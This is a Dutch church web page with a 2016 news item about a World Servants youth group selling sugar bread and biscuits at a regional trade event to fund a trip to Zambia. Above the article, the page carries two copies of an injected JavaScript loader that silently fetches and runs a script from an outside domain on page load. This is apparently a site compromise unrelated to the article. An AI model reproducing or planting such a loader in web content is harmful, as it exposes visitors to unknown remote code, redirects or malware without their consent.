;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); World Servants Groot succes op Centrale as - PKN Damwâld

World Servants Groot succes op Centrale as

Gepubliceerd op: zondag 2 oktober 2016

Afgelopen zaterdag stond de World Servants Damwoude op de centrale as tijdens het evenement “foarut mei de handel“. Met het verkopen van suikerbroden, koeken werd en envelop trekken werd er geld ingezameld voor de reis die de groep in 2017 gaat maken naar Zambia. Ook konden kinderen grabbelen in een grabbelton of geschminkt worden.

De centrale as trok veel bezoekers. Maar liefst 180.000 mensen kwamen af op het evenement! Op de centrale as stond 9 km aan bedrijven promoties, markt, podia en nog vele andere activiteiten voor jong en oud! Hiermee is het de langste handelsroute die tot nu toe in de wereld georganiseerd is. Het weer werkte ook geweldig mee. Er was regen voorspeld maar dat heeft plaats gemaakt voor een hele dag zon!

De World Servants groep heeft goede ‘zaken’ gedaan. Alle suikerbroden en de meeste koeken zijn verkocht. Veel kinderen gingen blij als Princess of leeuw weg en vele hebben een prijs gewonnen. Alles voor de reis naar Zambia. Uiteindelijk is meer dan €1000 euro opgehaald, een top bedrag wat niemand van te voren verwacht had!

Foarut mei de as, zowel in Fryslân als in Zambia!